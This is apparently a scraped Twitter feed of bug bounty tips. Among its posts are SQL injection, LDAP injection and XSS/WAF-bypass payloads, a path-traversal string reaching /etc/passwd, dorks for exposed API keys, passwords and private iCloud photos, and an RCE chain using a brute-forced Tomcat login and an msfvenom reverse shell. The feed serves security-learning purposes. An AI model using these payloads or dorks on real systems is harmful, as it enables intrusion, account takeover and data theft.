RT @renniepak: Pretty happy with this one-liner to extract endpoints from JavaScript files
cat [Link] | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips [Link]
RT @chiraggupta8769: shodan search org:"Target" [Link] --fields
#bugbountytips
#bugbountytip By @K4r1it0 [Link]
RT @pwntheweb: This is how I found SQL injection 100% of the time
For [Link]
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
#bugbounty #BugBountyTips
RT @0xElkot: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters
#bugbountytips #BugBounty #reconnaissance [Link]
RT @Naategh_: The number of zeros in [Link] doesn't matter, So we can use t
[Link]
[Link]
[Link]
...
#bugbounty #bugbountytips
RT @CharuDutt8: I just published How I was Able To bypass Cloudflare WAF [Link]
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
RT @AldenAous: Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty [Link] [Link]
RT @musiclouderlml: my first #bugbountytips,
the company's mail system can be vulnerable to IDN homographs,
try asking for a password reset for victim@example-com to victim@exàmple-com, if the backe
RT @trbughunters: Top 25 XSS Dorks according to OpenBugBounty
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht
RT @chiraggupta8769: Ways to bypass rate limit By @fuxksniper
#ethicalhacking #bugbounty #bugbountytips #bugbountytip [Link]
RT @AldenAous: ⛓️ Get Reflected XSS within 3 minutes ⛓️ by: @gkhck_
[Link]
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @cry__pto: Metasploit Community CTF 2020 [Link]:
[Link]
#Pentesting #Hacking #redteam #bugbountytips
RT @Bugcrowd: Want to make bug hunting your career, but hitting some blocks and uns
Take some tips and tricks from @ninad_mathpati in today's researcher spotlight! #ItTake
RT @TobiunddasMoe: My quick and basic recon routine for finding Subdomains while doi
#hackers #netsec #bugbountytip #bugbountytips #bugbounty #infosec #redteam #pen
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp [Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp [Link]
RT @gkhck_: To be more successful in bug bounty ...[I think] A short but very effective s
*Take a break, Learn more and Try again
[Link]
#bugbountytips #bugbountytip #infosec
RT @chiraggupta8769: Accessing the Admin Panel tip By @SalahHasoneh1
#bugbounty #bugbountytips #bugbountytip [Link]
RT @pdnuclei: Done with subdomain enumeration? here is how you can get more assets
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips [Link]
RT @mariusshoratau: Have you heard about AlienVault OTX? You can use it to get easy b
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht
RT @jodelak: Github dorks for finding secret data..
#bugbountytips #Security #Network #infographics
#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @r0bre: Proud to release ScriptFinder, a tool for automated JS file discovery!
[Link]
Thx to @TomNomNom @stokfredrik @hakluke @NahamSec @nnwakelam @zseano @EdO
#recon #hacking #infosec #bugbounty #bugbountytip #bugbountytips [Link]
RT @avasdream_: So here is my repository of dockerized pentesting tools. This comes in
[Link]
#Pentesting #Docker #Dockerfile #Containers #BugBounty #BugBountyTip #bugbounty
RT @emgeekboy: For all the hackers starting with bug bounty, here is how you can get r
#bugbountytips #recon #security
RT @_Rutik_Sangle_: #100daystolearnandimprove
Day 95:
1. Continued Solving some more Authentication labs on @WebSecAcademy
2. Read some Authentication Bypass blogs:
[Link]
[Link]
[Link]
[Link]
#infosec #bugbounty #bugbountytips
RT @Virdoex_hunter: web pentesting roadmap
[Link] @ADITYASHENDE17 @stokfredrik @NahamSec @nehatarick @m
RT @TheHackersNews: << Interesting Case Study >>
How Bug Bounty Platforms—HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter—R
[Link]
#infosec #pentest #bugbountytips #privacy #bugbountytip #cybersecurity #informatio
RT @gkhck_: #bugbountytips #infosec #bugbountytip
1 - Go Burp Suite / Target
2 - Select all items
3 - "Save selected items" (targets)
4 - [Link] -i targets -b -r ^/ -o cli [Link]
RT @knassar702: #PmG - Extract parameters/paths from urls
[Link]
#bugbountytips #recon [Link]
RT @618Slava: I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips [Link]
RT @Aj_louni: Just a quick reminder the AMA by @bsidesahmedabad with the humble lov
#bugbounty
#bugbountytips
#stream [Link]
RT @laud3b: Find SSRF issues via injecting headers (like x-forwarded-host, etc.) with this
.
[Link]
#bugbountytips #bugbounty [Link]
Broken link hijacking!
#bugbounty #bugbountytips [Link]
RT @SalahHasoneh1: Dorks for CVE-2020-3452
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @m4ll0k2: When you find a public form (contact form,etc.) try these payloads (blind
RT @cry__pto: DOM XSS in Gmail with a little help from [Link]:
[Link]
#bugbountytips #Pentesting #Hacking #redteam
RT @Zero0x00: Join us tonight at 9 pm for an intriguing live session with @thedawgyg
[Link]
Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
It's going to be a lot of fun!!!!
Do join us :)
#bugbountytips #hacking [Link]
RT @fayis_vadakkan: How to Bypass The Rate limiting✌️✌️
Add this header to the POST request with an IP address.
X-Forwarded-For: (Any IP Address )
#bugbountytips #bugbounty #vulnerability #Hackers #exploit
RT @AldenAous: Top 25 Local File Inclusion (LFI) Parameters 🛡️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @SalahHasoneh1: Using the password reset code more than once
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @laud3b: CloudFlare Origin Certificate
How to find out the real server IP hidden behind the Cloudflare CDN
[Link].common_name: CloudFlare Origin Certificate
#bugbountytips #bugbounty
RT @manas_hunter: Github dorks for finding secret data..
Happy hacking:)
#bugbountytips #infosec [Link]
RT @s3rgiomazari3go: Sublist3r is a tool designed to enumerate subdomains of website
[Link]
#cybersecurity #hackingtools #bugbountytips [Link]
RT @SalahHasoneh1: Ways to bypass rate limit
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @harshbothra_: It was great to have a talk with @dynamicCISO. In case if you misse
Slides: [Link]
Stream: [Link]
Thanks, @hacback17 for carrying this out.
#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd
RT @laud3b: You can change WPEngine's config file on the WordPress blogs. Path "/_wp
#bugbountytips #bugbounty [Link]
RT @Jhaddix: Monday Night #BugBounty #bugbountytips
- Found 2 sites with source code disclosure via git.
- Struggled with git for a long while to extract files from objects.
- Audited some PHP
- Frustrated with git, going to bed =P
RT @bbuerhaus: Once I realized the trick to @adamtlangley's "I once was blind but now
TIL @PortSwigger's Burp Collab does SMTP!
This is insaaanely useful.
#bugbounty #bugbountytips [Link]
RT @SalahHasoneh1: Accessing the Admin Panel tip
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @terjanq: I created a repository to keep track of cool XSS payloads [Link]
Check this out!
#xss @XssPayloads #bugbountytips [Link]
RT @dhakal_ananda: Wanna know the best way to be demotivated in the bug bounty fie
Compare yourself with others!
#bugbounty #bugbountytips
RT @chiraggupta8769: Github Dorks For Finding Information Using Extension By @D0rke
#bugbounty #bugbountytip #bugbountytips [Link]
RT @chiraggupta8769: <?php var_dump(explode(',',ini_get('disable_functions'))); ?>
Handy as hell tip for checking which functions you need to bypass for PHP RCE.
Tip By @Random_Robbie
#bugbountytips #bugbountytip #bugbounty
RT @intigriti: Did you know you can get the source code of Electron apps by using this h
RT @XSaadAhmedX: BugBountyTip: If you're playing with `API ENDPOINT` always try to s
#bugbountytip #bugbountytips #bugbounty [Link]
RT @rapiddns: shodan dork
title:"SSL VPN Service"
"webvpnlogin=1"
Happy Hacking!
#bugbountytip #bugbountytips #bugbounty #cisco #vulnerability [Link]
RT @hacback17: Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Fre
[Link]
Coupon Code: COPSHOTMEINPORTLAND
#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm
RT @xalerafera: #bugbountytips #hackerone #bugbounty #recon
Find api links in subdomains, or how to find a simple SSRF in five minutes in a big compa
assetfinder --subs-only [Link] | waybackurls | grep "?url="
Happy hacking [Link]
RT @11xuxx: Horizontal priv escalation & full account takeover
1. registered a new user for my company at "/api/register/48e33445-f797-4e62-801f-e
2. changed the UUID to a numerical value -> "2"
3. user created under another company
4. full account takeover
#bugbountytips [Link]
RT @amanmahendra_: Shodan dork for CVE-2020-3452
“Set-Cookie: webvpn;”
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #togetherwehithar
RT @MrCyberwarrior: Privilege Escalation
#bugbounty #BugBountyTips [Link]
RT @11xuxx: Wildcard bypass & LFI
1. Intercepted a POST req that pointed to a local file "/usr/local/redacted/filename"
2. tried "/etc/passwd" -> bad request
3. "/user/local/../../etc/passwd" -> bad request
4. "/user/local/redacted/../../../etc/passwd" -> OK
5. LFI & bounty
#BugBountyTips [Link]
RT @iambharat18: #BugBountyTips #bugbounty #SharingIsCaring Bug: 2FA Bypass->
-- Sometimes "0000" can give the correct OTP response for every account and redirect y
RT @poison_h1: This tip may be posted by someone before. However, I encountered this
#BugBountyTip #BugBountyTips #infosec [Link]
RT @avanish46: After 2 days of struggling, Bypassed a strong XSS filter on one of the pr
[ No '>' was allowed , no Html tags, Character length 35 ]
XSS Payload used :-
<svg onload="alert(1)" <="" svg=""
@XssPayloads
#BugBountyTips #BugBounty [Link]
RT @_heinthant: Got a survey from?
Don't only test for blind xss
Try this once
#bugbountytips [Link]
RT @Virdoex_hunter: SSRF one-liner command (both manual and automatic) and tip
More SSRF tips:
[Link] #bugbountytip #bugbountytips
@ADITYASHENDE17 @1ndianl33t @stokfredrik @dhakal_ananda @remonsec @trippy_bh
RT @alicanact60: Don't forget to check the responses. Maybe you can find some tokens l
I found a token in response and went to mailbox. The email verification link was xx+.com
And I saw they are same tokens!
#BugBountyTips #BugBountyTip [Link]
RT @SatyamGothi: NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!
[Link]
Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️
Hope it helps :)
#bugbountytips #bugbounty
RT @stokfredrik: HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loo
August is going to be.. crazy!
feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec [Link]
I was testing for SSTI on this page using this payload {{9-3}} and this is the output I am get
#bugbountytips
#bugbounty [Link]
RT @PoundXI: Two good articles about HTTP Request Smuggling.
[Link]://[Link]/trsGgcBCOg
[Link]://[Link]/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @Queseguridad: When auditing a SAP it is important to have a good dictionary, as it
RT @HusseiN98D: SSRF script requested by @Alra3ees
This script will take a domain and a callback server, append SSRF parameters and fire th
#BugBountytip #BugBountytips #BugBounty [Link]
RT @m4ll0k2: I found a lot of SSRF issues via injecting headers (like x-forwarded-host, etc.) w
[Link]
By @hakluke
Will be helpful for new bug bounty hunters. Watch it out.
#bugbounty #bugbountytips #cybersecurity
RT @maverickNerd: I just published Android App Security & Testing [Link]
It was long pending, found a draft in my notes, corrected it and thought why not share i
#androidsecurity #bugbountytips #bugbounty
RT @lutfumertceylan: 🚀 How can you make a Javascript Polyglot for XSS? 🚀
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @harshbothra_: XSS is pure love and combined with luck, it may give unexpected res
#bugbountytips #bugbounty #hacking #bugbountywriteups #security
RT @HackerHumble: OTP Verification bypass #5
1. Web app is sending a verification code to email before changing some sensitive fields
2. Intercepted the request in burp and found the email parameter (eg: email: victim@gm
#bugbountytips #bugbounty #hacking
RT @Kill__3r: Noob question?
Need help.
When I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty [Link]
RT @CristiVlad25: What I consider the top two learning and testing books for #pentestin
#cybersecurity #bugbountytips #penetrationtesting
[Link]
RT @ShMalav: #bugbountytips
#bugbountytip
Subdomain Enumeration tip
Install [Link]
run this tool and get [Link] as a result .
Now
Run subfinder from project discovery and use that file
subfinder -d domain_com -o [Link] -nW -v -rL [Link]
😉 😉😉😉
RT @thedarkwayg: Yesterday I sent 5 submissions to @Bugcrowd .
Results: 2 Triaged, 3 Dups 😂😅.
WAF Bypass payload:
">'><details/open/ontoggle=confirm('XSS')>
#BugBountyTips #BugBounty [Link]
RT @_Y000_: #Dork to find pages vulnerable to #xss
This one targets a #vulnerability in a #wordpress theme called Fruitful
intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext
#CyberSecurity #hacked #bugbountytips [Link]
RT @_Y000_: This one is for finding vulnerable iCloud devices, we can see all
intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camer
*Note: you can modify the parameters for other results
#Cybersecurite #dork #bugbountytips [Link]
RT @shreyasrx: LDAP Injection 💥
1/3
Payloads :
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
#bugbountytips
#shieldindia
RT @rohit_sonii: Escalating Self XSS to Account Takeover by chaining multiple low level
[Link]
#bugbountytips #bugbountytip #bugbounty #infosec #togetherwehitharder
RT @manas_hunter: #bugbountytips
#bugbounty
#infosec [Link]
RT @GochaOqradze: #bugbountytip #bugbountytips
Today I bypassed the F5 BIG-IP WAF with an XSS payload.
Interestingly, %5K is converted to the "P" character.
In response source I got
"><P/onweel=alert(1)>mouse wheel here<!--
Payload:
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
RT @y0dhha: XSS Cheat Sheet
#xss #bugbounty #exploit #BugBountyTips #BugBountyTip [Link]
RT @zedsec009: Cloudflare bypass & template injection to XSS in one shoot !
{{x = {'y':''.[Link]}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#bugbountytips
RT @0xVeera: Private Profile Disclosure - going beyond /wp-json/
The site was using Wordpress
I found various bypass techniques to access private user information.
#bugbountytips @Bugcrowd @SynackRedTeam
Thanks to @ADITYASHENDE17 @u1tran00b @upen1994 [Link]
RT @hacback17: It was a fantastic session loaded with lots of live examples. Thank you
Video: [Link]
Slides: [Link]
#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #
RT @th3hokag3: Bug Bounty Tip:
#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity [Link]
RT @trbughunters: Find Passwords, Exposed Log Files with Google Dorks
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @intigriti: How can you leverage out of scope domains without breaking a program's
@healthyoutlet enumerates OOS subdomains & creates a wordlist to use for in-scop
RT @AldenAous: 🚀💡 XSS from another level 💡🚀
[Link]
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec
RT @hackd00r: Subscribe to our Telegram Channel for Hackdoor Cyber Security Events a
🤖🤖🔥🔥👾👾👇👇👇
[Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
RT @securestep9: Stuck at home due to Coronavirus? It is a great time to learn about fin
Here's a great collection of write-ups collected by @PentesterLand from 2012 to 2020:
#BugBountyTips
#BugBountyWriteups
[Link] [Link]
RT @hsakarp_ilajna: comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains
#bugbountytips #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
RT @KomodoGT: [Link] MR [Link] >>> #blockchain #open
RT @D0rkerDevil: #bugbountytips
webarchive > found email change unconfirmed link > checked source > found e
at this point I cannot change the email of the user as it won't be good for the user
reported
#bugbounty #security
RT @farah_hawa01: NEW VIDEO: In this video, I explain how JWTs work and how to att
[Link]
RT @micha3lb3n: Just gimme a list of urls or a url, I can do the following :
1. Extract all the hidden endpoints from the source.
2. Filter out live domains
3. Brute force endpoints with a word list.
And all these really fast
says SourceWolf.
[Link]
{..}
#bugbountytips
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
#programfolback #tutorial #code #opensource
RT @SalahHasoneh1: Top 10 - GitHub Dorks for Finding API Keys
Rebuilt in a better way
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @roughwire: Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-ad
Triaged with "High" instead of "Critical". Don't know what is wrong!
#bugbountytips Tweet has tip as well :D
RT @laud3b: Shellshock still works for some servers; you can also try the
nmap script.
nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty [Link]
RT @D4Vinci1: Just published a script that fingerprints BigIP servers in a given list of dom
link:
[Link]
#bugbounty
#bugbountytips
#Pentesting #bigip #F5 [Link]
RT @manas_hunter: Bypassing 2FA with CSRF.
Apply this for easy bounties:)
#bugbountytips [Link]
RT @K4r1it0: shodan search org:"Target" [Link] --fields ip_str,po
#bugbountytips
#bugbountytip [Link]
RT @intigriti: Want to find critical bugs by changing a single header? Do just like @hacke
RT @_mkahmad: Account Takeover by JWT Token forging by me :) #bugbountytips #bu
RT @fuxksniper: GraphQL — Common vulnerabilities & how to exploit them:
[Link]
Understanding Graphql :
[Link]
Some good graphql stuff
(Not by me)
#bugbountytips #bugbountytips
RT @D0cK3rG33k: GitHub Dorks for Finding API Keys, Tokens and Passwords
api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth
#bugbountytips
RT @AldenAous: Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @TheHackersNews: Watch Out 🔥
Hackers are abusing #Google Analytics service to bypass CSP web-security feature and
Learn how it works — [Link]
#infosec #cybersecurity #bugbountytips #bugbountytip [Link]
RT @intigriti: Excellent e-mail address payloads by @securinti! 🤯
Rewatch "You've got pwned: exploiting e-mail systems" at #NahamCon here: [Link]
RT @cry__pto: Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
[Link]
#PenTest #Hacking #bugbountytips #redteam
RT @ADITYASHENDE17: [Link] /plugins/servlet/oauth/users/icon-u
I always fuzz target name with my site name to gain SSRF AWS metadata.
Thanks to @D0rkerDevil SSRF write-up.
Remaining Google it
#bugbountytips #kongsec
RT @daoud_youssef: one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: [Link] --url '[Link]
#bugbountytips #bugbountytip @rapiddns
RT @pdiscoveryio: #httpx v0.0.7 updates:-
☑Added TLS Probe (Subdomains from SSL)
☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length
[Link]
#hackwithautomation #bugbounty #security #bugbountytips [Link]
RT @mirhatx: Bash code for manual subdomain takeover testing:
cat [Link] | xargs -n1 dig @[Link] | grep -A10 NXDO | grep CNAME
#BugBounty #bugbountytips #bugbountytip @hacktivist1337
RT @0x0Cj: Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
[Link]
RT @safe_buffer: Wait !! Are you serious? are you going to help ppl to learn smt could re
RT @AldenAous: 🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @HusseiN98D: As per the vote results, here you go!
A cool XXE resulting from an SSRF found on a local company website during a pentest. DMs
#bugbounty #bugbountytip #bugbountytips #infosec [Link]
RT @ITSecurityguard: Massive shoutout to [Link] for creating https:/
it is exactly what most of you people are looking for 😍
#recon #bugbountytips #BugBounty #AutomationAnywhere
RT @heald_ben: Easy way to find exposed production code:
1. Find a Gitlab hosted sub domain, usually named “[Link]” or “[Link]”
2. Even if login is required, try the “/snippets” endpoint.
3. View internal source code snippets.
#bugbountytips #bugbounty #bugbountytip
RT @11xuxx: RCE on big company
1. subdomain enum
2. used "ffuf" and found tomcat on ";/..;/manager"
3. weak cred (used hydra)
4. "/manager/html" blocked, "/manager/text" was not
5. used "msfvenom" and created reverse shell war
6. used "curl" and deployed the war file
7. rce!
#bugbountytips [Link]
RT @_Rutik_Sangle_: Finally today I completed the #100daystolearnandimprove challe
journey ahead.
Thanks to all
RT @HusseiN98D: An overview of what I did for my recent $10 000 bug. Always go for th
RT @roughwire: Running @pdnuclei on multiple template and don't want to see informat
cat [Link] | grep -v -e templateid1 -e templateid2
#bugbounty #bugbountytips
RT @AmitMDubey: This little command will get all the Wayback endpoints to compare it
Tools -
waybackurls & unfurls by @TomNomNom
httpx by @pdiscoveryio
(I know it can be further optimized)
#bugbounty #bugbountytips #bugbountytips [Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp [Link]
RT @11xuxx: XXE
1. change password func -> JSON
2. converted to XML -> 200 OK
3. created dtd file on my ec2 and started webserver on port 80
4. crafted a XXE payload!
5. bounty!
Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change th
#bugbountytips [Link]
Two good articles about HTTP Request Smuggling.
[Link]://[Link]/trsGgcBCOg
[Link]://[Link]/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @pdnuclei: Here is a #tip for using nuclei for a given list of subdomains, Nuclei accep
#bugbountytips [Link]
RT @F3RR4R1_R3D: Why am I just now reading this? Anyway, good recon methodology
RT @KomodoGT: I had some spaghetti last night this is what I found this morning. #bug
I had some spaghetti last night this is what I found this morning. #bugbountytips https:
RT @rnd_infosec_guy: #bugbountytip
Don’t propagate bug bounty as a reasonable job model. It is the same as saying everyon
#bugbountytips #infosec #BugBounty
RT @ssh0x00r: Do we need to know JavaScript to get started in bug bounty?
#bugbountytips #hacking #infosec #hackerone
RT @chiraggupta8769: Awesome Tip By @intigriti And Tool By @sratarun #bugbountytip
RT @_YashGoti_: Need to automate your recon process with telegram chat here you go.
#bugbountytips
#recon
#automate
[Link]
RT @krizzsk: A small but effective way to recon and get internal subdomains to increase
Why am I just now reading this? Anyway, good recon methodology and nice #bugbount
RT @dynamicCISO: With @HarshBothra_, we have delivered a great session on #Offensi
Video: [Link]
Slides: [Link]
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @HackerOn2Wheels: Bypass I learned from @rene_kroka this week:
[Link]
onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,
👆 = alert(1)
#bugbounty #bugbountytips
RT @Ranger_one_: Great Resource for Template Injection!
[Link]
[Link]
[Link]
#bugbountytip #bugbountytips #bugbounty
#bugbountytips
webarchive > found email change unconfirmed link > checked source > found e
At this point I cannot change the mail of the user as it won't be good for the user.
Reported.
#bugbounty #security
RT @Faeeqjalali: OTP bypass .
Checked the response when entering a wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
RT @hsakarp_ilajna: Things you should Gather: #Osint :
metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version
#bugbountytips #bugbounty
🧮 Top 25 Local File Inclusion (LFI) Parameters
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
⛓️Get Reflected XSS within 3 minutes ⛓️by:@gkhck_
[Link]
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @ja1sharma: Bash script to scrape Spring applications via Shodan and enumerate se
Usage: ./[Link] <redact>
Output: <redact-Spring_FFUF.txt>
>:[Link]
Any suggestions are welcome.
Credit: @K4r1it0 @Madrobot_
#bugbounty #bugbountytips [Link]
It was a fantastic session loaded with lots of live examples. Thank you so much, @harsh
Video: [Link]
Slides: [Link]
#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #
RT @Virdoex_hunter: Bug bounty fast hunting find all subdomains using all tools and the
It was great to have a talk with @dynamicCISO. In case you missed it, find my slides &a
Slides: [Link]
Stream: [Link]
Thanks, @hacback17 for carrying this out.
#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd
With @HarshBothra_, we have delivered a great session on #Offensive #Recon. The aud
Video: [Link]
Slides: [Link]
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @_ayoubfathi_: Ran into an API subdomain with an empty response?
You may get lucky and fetch the full API spec by hitting the following endpoints:
/[Link]
/swagger/[Link]
/api/[Link]
/v1.x/[Link]
/swagger/[Link]
...
#bugbountytips #bugbounty #hackerone
RT @chiraggupta8769: Top 25 Remote Code Execution (RCE) Parameters by @trbughunt
#bugbountytips #bugbountytip #bugbounty [Link]
RT @harshbothra_: Easily find exposed secrets from Github and Identify manually if they
#bugbountytip #bugbountytips #bugbounty #security [Link]
Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @th3hokag3: BUG BOUNTY TIP:
#bugbountytips #bugbounty #bugbountytip #cybersecurity #infosec [Link]
RT @cyanpiny: #bugbountytips [Link]
#bugbountytips [Link]
CloudFlare Origin Certificate
How to find out the real server IP hidden behind the Cloudflare CDN
[Link].common_name: CloudFlare Origin Certificate
#bugbountytips #bugbounty
RT @SalahHasoneh1: Manipulation of email by Latin letters
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
Bash script to scrape Spring applications via Shodan and enumerate sensitive endpoints
Usage: ./[Link] <redact>
Output: <redact-Spring_FFUF.txt>
>:[Link]
Any suggestions are welcome.
Credit: @K4r1it0 @Madrobot_
#bugbounty #bugbountytips [Link]
What I consider the top two learning and testing books for #pentesting and #bugbounty
#cybersecurity #bugbountytips #penetrationtesting
[Link]
RT @AldenAous: Second medium blog-post:
Stealing your Paytm information using XSS by: @VirenPawar_
[Link]
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
🚀💡 XSS from another level 💡🚀
[Link]
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec
RT @ehsayaan: If you found some api key or secret key then these are some tips to Esca
#BugBounty #bugbountytips [Link]
RT @pwn0sec: [Link]
#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter
RT @chiraggupta8769: A small Burpsuite trick which helped @amitmdubey to find Blind
Step 1: Use Intruder to Bruteforce Headers
Step 2: Add Burp collaborator URL as value
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Taborator Extension to monitor hits
#bugbounty #bugbountytips [Link]
RT @faizalabroni: 1. ./[Link] -u target -e php,html,js,xml -x 500,403
2. found [Link]
3. clone & use [Link]
4. ./[Link] --url [Link] --match [Link]
5. result in output dir and just open it
#bugbounty #bugbountytips [Link]
RT @terjanq: I recently discovered a fancy way to execute arbitrary XSS without parenth
[Link]
#javascript #bugbountytips #xss [Link]
RT @r00t98: Bypass rate limit to account takeover
1. Server limited brute force OTP by ip.
2. Install & config ip rotate(burp suite extender).
3. Send password reset code.
4. Brute force OTP with intruder.
5. Change password.
#bugbountytip #bugbountytips
RT @bountyhunter_fr: Here is a way to escape a restricted shell in Linux
#bugbountytips
What would you have done to escape a restricted shell? [Link]
comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains
#bugbountytips #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
⏰Reflected XSS on Sony with Google Dork & Akamai WAF Bypass ⏰
[Link]
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @hsakarp_ilajna: My #twitter and #linkedin feed is flooded with Bug Bounty tips Tw
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @BugBountyRecon: What should you look for when attacking OAuth2?
A nice overview: [Link]
#bugbountytips #BugBounty
RT @arkadiyt: I've added Intigriti and YesWeHack support to my bounty-targets-data cr
Happy hunting: [Link] #bugbounty #bugbountytips
RT @AldenAous: Ways to bypass rate limit
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @trbughunters: Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | #follow Java
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
RT @m4ll0k2: [Link] - Simple Python tool for find a unique words in
#bugbountytips [Link]
RT @taaminz: Access to internal company info
1. Find an internal dev domain using [Link]
2. Subdomain enumeration on internal domain
3. Find internal API subdomain
4. API key and endpoint in javascript file
